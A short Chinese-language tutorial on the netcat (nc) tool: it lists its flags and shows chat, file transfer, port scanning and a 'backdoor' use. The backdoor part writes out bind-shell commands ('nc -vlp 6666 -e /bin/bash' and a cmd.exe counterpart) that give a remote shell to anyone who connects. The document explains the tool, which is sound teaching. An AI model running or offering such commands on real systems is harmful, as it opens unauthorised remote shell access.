netcat又称nc工具，其最主要的作用就是建立连接并返回两个数据流，剩下的就看各位的想象力了，想象力是很重要的，这也是这个工具的强大之处的所在，所以重要的东西才要说三遍，想象力！

具体参数如下：

-d                              无命令行界面，使用后台模式

-e prog                     程序重定向，一旦连接，就执行 [危险！！],（可以理解为向外发送一个东西，对方连上自动执行）

-g gateway               源路由跳跃点，不超过8

-G num                     源路由指示器：4,8,12.。。。。。

-h                              获取帮助信息

-i<延迟秒数>            延时设置，端口扫描时使用

-l                              监听入站信息

-L                             监听知道NetCat被结束（可断开重连）

- n                            以数字形式表示的IP地址，不要使用DNS反向查询IP地址的域名

- o<输出文件>         可以将连接上往来传输的数据以16进制的形式记录到logfile中（每行的左半部分是16进制显示，右半部分为ascii显示）。其中，

每行的第一个字符为”<”或”>”，分别表示接收的数据或发送的数据。

- p post                   打开本地端口

- r                           随机本地和远程的端口

- s addr                  本地源地址

- t                           以TELNET的形式应答入站请求

- u                          用UDP建立连接

- v                          显示详细信息[使用-vv获取更信息的信息]

- w<超时秒数>      连接超时设置

- z                          I/O模式[扫描时使用]，连接成功后立即关闭连接， 不进行数据交换

功能：

1.可以用来聊天。

nc -l -p 6666 监听6666端口，并显示详细信息(-l:监听入站信息)

nc 172.16.150.152 6666 连接172.16.1.150.152的6666端口

2.做后门

nc 的-e参数程序重定向，一 旦连接，就执行 [危险！！],（可以理解为向外发送一个东西，对方连上自动执行）

nc -vlp 6666 -e /bin/bash #监听6666端口，然后把/bin/bash文件发送出去，只要有人连接此端口，对方就执行/bin/bash文件，此文件为linux的shell,windows对应的是nc -e C:\Windows\System32\cmd.exe

直接监听ip 端口就可以反弹得到一个shell

关于nc的一些理解：

当然还可以拿来传输文件、扫描端口nc如果连不上那么就是没有开，反之开放。